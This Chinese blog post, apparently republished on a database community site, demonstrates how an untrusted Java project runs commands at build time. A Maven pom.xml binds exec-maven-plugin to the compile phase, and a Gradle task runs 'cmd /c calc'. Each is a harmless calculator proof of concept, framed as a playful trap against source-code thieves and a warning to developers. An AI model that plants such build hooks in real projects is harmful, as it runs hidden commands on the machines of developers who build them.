暂无图片
暂无图片
暂无图片
暂无图片
暂无图片
首页 / 别想用我源码:针对源码泄露的反制思路(仅供娱乐)

别想用我源码:针对源码泄露的反制思路(仅供娱乐)

pen4uin 2021-11-13
1104

0x01 起

自从看了@DriverTom师傅写的这篇文章后,

给我带来的感受就是,关于攻防演练的“潜规则”就只剩下


0x02 承

之前在fofa的帮助“捡到”了几套源码

同时,也从github从git clone了很多工具的源码(java)进行review 学习,但是在IDEA初次打开的时候,相信大家对下面这个弹窗不会陌生

我不知道大家的选择是什么,我之前都是毫不在意地Trust Project,然后使用maven打包运行。

但是针对这个小细节,不由心生疑惑:“这个潜意识的操作有被反制的可能吗?”


0x03 转

这里只测试经常遇到了的两种Java项目构建工具,提供思路,其他的可自行测试。

Maven

测试如下:

源码

demo.java

public class demo {
public static void main(String[] args) {
  System.out.println("Hacked By Yourself !");
  }
}
复制

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>


<groupId>org.example</groupId>
<artifactId>rceDemo</artifactId>
<version>1.0-SNAPSHOT</version>


<properties>
  <maven.compiler.source>7</maven.compiler.source>
  <maven.compiler.target>7</maven.compiler.target>
</properties>
<build>
  <plugins>
      <plugin>
          <groupId>org.codehaus.mojo</groupId>
          <artifactId>exec-maven-plugin</artifactId>
          <version>1.1.1</version>
          <executions>
              <execution>
                  <id>some-execution</id>
                  <phase>compile</phase>
                  <goals>
                      <goal>exec</goal>
                  </goals>
              </execution>
          </executions>
          <configuration>
              <executable>calc</executable>
          </configuration>
      </plugin>
  </plugins>
</build>
</project>
复制

弹计算器

Gradle

测试如下:

源码

build.gradle

plugins {
id 'java'
}


group 'org.example'
version '1.0-SNAPSHOT'


repositories {
mavenCentral()
}


dependencies {
testImplementation 'org.junit.jupiter:junit-jupiter-api:5.7.0'
testRuntimeOnly 'org.junit.jupiter:junit-jupiter-engine:5.7.0'
}


task demo(type: Exec){
commandLine 'cmd', '/c', 'calc'
}
复制

settings.gradle

rootProject.name = 'gradleRce'
复制

弹计算器

0x04 合

其实关于漏洞产生的本质—“Untrusted Data From Outside”,不仅适用于各种网站、各种软件,也同样适用于我们自己。

这篇文章虽有供娱乐的目的,但同时也是给自己提个醒儿,以后在这些方面还是留意一下,别栽了”跟头“!至于如何提升杀伤力真正达到反制的效果,我不会,我是废物。

参考

https://qastack.cn/programming/3491937/i-want-to-execute-shell-commands-from-mavens-pom-xml
https://cloud.tencent.com/developer/ask/59734
复制



数据库
文章转载自pen4uin,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论

相关阅读

【专家有话说第五期】在不同年龄段,DBA应该怎样规划自己的职业发展?
墨天轮编辑部
1378次阅读
2025-03-13 11:40:53
2月“墨力原创作者计划”获奖名单公布
墨天轮编辑部
481次阅读
2025-03-13 14:38:19
AI的优化能力,取决于你问问题的能力!
潇湘秦
461次阅读
2025-03-11 11:18:22
2025年3月国产数据库大事记
墨天轮编辑部
424次阅读
2025-04-03 15:21:16
优炫数据库成功应用于国家电投集团青海海南州新能源电厂!
优炫软件
352次阅读
2025-03-21 10:34:08
征文大赛 |「码」上数据库—— KWDB 2025 创作者计划启动
KaiwuDB
317次阅读
2025-04-01 20:42:12
国产化+性能王炸!这套国产方案让 3.5T 数据 5 小时“无感搬家”
YMatrix
308次阅读
2025-03-13 09:51:26
一键装库脚本3分钟极速部署,传统耗时砍掉95%!
IT邦德
271次阅读
2025-03-10 07:58:44
GoldenDB数据库社区正式上线!期待与您共享新知
GoldenDB分布式数据库
255次阅读
2025-03-12 14:06:39
从HaloDB体验到国产数据库兼容性
多明戈教你玩狼人杀
222次阅读
2025-04-07 09:36:17